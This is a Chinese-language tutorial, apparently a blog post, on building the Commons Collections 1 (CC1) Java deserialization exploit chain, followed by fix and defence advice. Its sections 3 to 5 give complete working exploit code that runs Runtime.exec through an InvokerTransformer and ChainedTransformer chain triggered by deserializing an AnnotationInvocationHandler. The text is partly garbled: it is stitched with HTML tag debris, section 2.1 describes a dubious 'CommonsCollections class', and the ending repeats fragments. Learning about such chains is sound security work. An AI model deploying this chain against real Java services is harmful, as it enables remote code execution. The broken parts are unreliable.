Java反序列化漏洞：Commons Collections 1(CC1)链构造详解<\/h1>

1. 背景介绍<\/h2>
Commons Collections是Apache提供的一个Java集合框架扩展库，广泛应用于各种Java项目中。CC1链是Java反序列化漏洞中最经典的利用链之一，它利用了Commons Collections库中的一系列特性来实现远程代码执行。<\/p>

2. 核心组件分析<\/h2>

2.1 CommonsCollections类<\/h3>

CommonsCollections是一个集合类，具有以下特点：<\/p>

接受广泛的参数类型<\/li>
实现了Serializable接口（可序列化）<\/li>

包含Transformer接口机制<\/li> <\/ul>

2.2 Transformer接口<\/h3>

Transformer接口是CC1链的核心，定义如下：<\/p>

public<\/span> interface<\/span> Transformer<\/span> {<\/span>
<\/span><\/span>    Object transform<\/span>(<\/span>Object input);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>该接口的作用是接受一个对象，调用transform方法进行转换。<\/p>
3. 漏洞发现过程<\/h2>
3.1 关键发现点<\/h3>
研究者发现InvokerTransformer类实现了Transformer接口，其transform方法实现如下：<\/p>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>this<\/span>.<\/span>iMethodName<\/span>,<\/span> this<\/span>.<\/span>iParamTypes<\/span>);<\/span>
<\/span><\/span>        return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> this<\/span>.<\/span>iArgs<\/span>);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception ex)<\/span> {<\/span>
<\/span><\/span>        \/\/ 异常处理
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>这个方法可以通过反射调用任意对象的任意方法，包括Runtime.exec()这样的危险方法。<\/p>
3.2 验证InvokerTransformer<\/h3>
可以通过以下代码验证InvokerTransformer的命令执行能力：<\/p>
new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>    new<\/span> Object[]{<\/span>"calc"<\/span>}).<\/span>transform<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>这段代码会执行系统计算器程序，证明了InvokerTransformer确实可以实现任意命令执行。<\/p>
4. 调用链构造<\/h2>
4.1 寻找transform调用点<\/h3>
为了构建完整的利用链，需要寻找哪些类会调用transform方法。研究发现TransformedMap类满足这个条件。<\/p>
4.2 TransformedMap分析<\/h3>
TransformedMap是一个Map装饰器，当对Map进行setValue操作时会调用transform方法：<\/p>

TransformedMap.decorate()方法可以创建一个TransformedMap实例<\/li>
当调用Map.Entry.setValue()时，会触发以下调用链：

AbstractInputCheckedMapDecorator.setValue()<\/li>
TransformedMap.checkSetValue()<\/li>
Transformer.transform()<\/li>
<\/ul>
<\/li>
<\/ol>
关键点：<\/p>

checkSetValue是protected方法，不能直接调用<\/li>
需要通过Map.Entry.setValue()间接触发<\/li>
<\/ul>
4.3 示例代码<\/h3>
\/\/ 创建恶意Transformer
<\/span><\/span><\/span><\/span>InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建并装饰Map
<\/span><\/span><\/span><\/span>HashMap<<\/span>Object,<\/span>Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>"key"<\/span>,<\/span> "value"<\/span>);<\/span>
<\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> decoratedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>hashMap,<\/span> null<\/span>,<\/span> invokerTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 触发transform调用
<\/span><\/span><\/span><\/span>for<\/span>(<\/span>Map.<\/span>Entry<\/span> entry :<\/span> decoratedMap.<\/span>entrySet<\/span>())<\/span> {<\/span>
<\/span><\/span>    entry.<\/span>setValue<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 反序列化利用<\/h2>
5.1 寻找readObject调用点<\/h3>
为了在反序列化时触发漏洞，需要寻找在readObject方法中调用setValue的类。研究发现AnnotationInvocationHandler满足这个条件。<\/p>
5.2 AnnotationInvocationHandler分析<\/h3>
关键特性：<\/p>

实现了Serializable接口<\/li>
在readObject方法中会遍历memberValues的entry并调用setValue<\/li>
构造方法接受一个Map参数（memberValues）<\/li>
<\/ul>
5.3 构造完整利用链<\/h3>
完整利用需要解决两个问题：<\/p>

AnnotationInvocationHandler没有public构造方法，需要通过反射创建<\/li>
Runtime对象不可序列化，需要间接获取<\/li>
<\/ol>
解决方案：<\/p>

使用ChainedTransformer将多个Transformer串联<\/li>
使用ConstantTransformer获取Runtime.class<\/li>
使用反射创建AnnotationInvocationHandler实例<\/li>
<\/ul>
5.4 完整利用代码<\/h3>
\/\/ 创建Transformer链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>Transformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建TransformedMap
<\/span><\/span><\/span><\/span>Map innerMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>innerMap.<\/span>put<\/span>(<\/span>"key"<\/span>,<\/span> "value"<\/span>);<\/span>
<\/span><\/span>Map outerMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 通过反射创建AnnotationInvocationHandler
<\/span><\/span><\/span><\/span>Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object instance =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span> outerMap);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化和反序列化触发漏洞
<\/span><\/span><\/span><\/span>ByteArrayOutputStream baos =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>baos);<\/span>
<\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>instance);<\/span>
<\/span><\/span>oos.<\/span>close<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>baos.<\/span>toByteArray<\/span>()));<\/span>
<\/span><\/span>ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>6. 漏洞修复<\/h2>
Apache Commons Collections在后续版本中修复了此漏洞，主要措施包括：<\/p>

增加了对InvokerTransformer的安全检查<\/li>
引入了Serialization过滤器<\/li>
建议升级到最新版本（3.2.2+或4.1+）<\/li>
<\/ol>
7. 防御措施<\/h2>

升级Commons Collections到安全版本<\/li>
使用Java的Serialization过滤器<\/li>
避免反序列化不可信数据<\/li>
使用白名单机制限制可反序列化的类<\/li>
<\/ol>
8. 总结<\/h2>
CC1链是Java反序列化漏洞的经典案例，它利用了：<\/p>

Commons Collections的Transformer机制<\/li>
Java反射机制<\/li>
Java反序列化特性<\/li>
多个类的特定方法调用关系<\/li>
<\/ol>
理解CC1链的构造过程对于学习Java安全、反序列化漏洞防御具有重要意义。<\/p>

Java反序列化漏洞：Commons Collections 1(CC1)链构造详解<\/h1>

1. 背景介绍<\/h2> Commons Collections是Apache提供的一个Java集合框架扩展库，广泛应用于各种Java项目中。CC1链是Java反序列化漏洞中最经典的利用链之一，它利用了Commons Collections库中的一系列特性来实现远程代码执行。<\/p>

2. 核心组件分析<\/h2>

3. 漏洞发现过程<\/h2>

4. 调用链构造<\/h2>

4.1 寻找transform调用点<\/h3> 为了构建完整的利用链，需要寻找哪些类会调用transform方法。研究发现TransformedMap类满足这个条件。<\/p>

5. 反序列化利用<\/h2>

5.1 寻找readObject调用点<\/h3> 为了在反序列化时触发漏洞，需要寻找在readObject方法中调用setValue的类。研究发现AnnotationInvocationHandler满足这个条件。<\/p>

1. 背景介绍<\/h2>
Commons Collections是Apache提供的一个Java集合框架扩展库，广泛应用于各种Java项目中。CC1链是Java反序列化漏洞中最经典的利用链之一，它利用了Commons Collections库中的一系列特性来实现远程代码执行。<\/p>

4.1 寻找transform调用点<\/h3>
为了构建完整的利用链，需要寻找哪些类会调用transform方法。研究发现TransformedMap类满足这个条件。<\/p>

5.1 寻找readObject调用点<\/h3>
为了在反序列化时触发漏洞，需要寻找在readObject方法中调用setValue的类。研究发现AnnotationInvocationHandler满足这个条件。<\/p>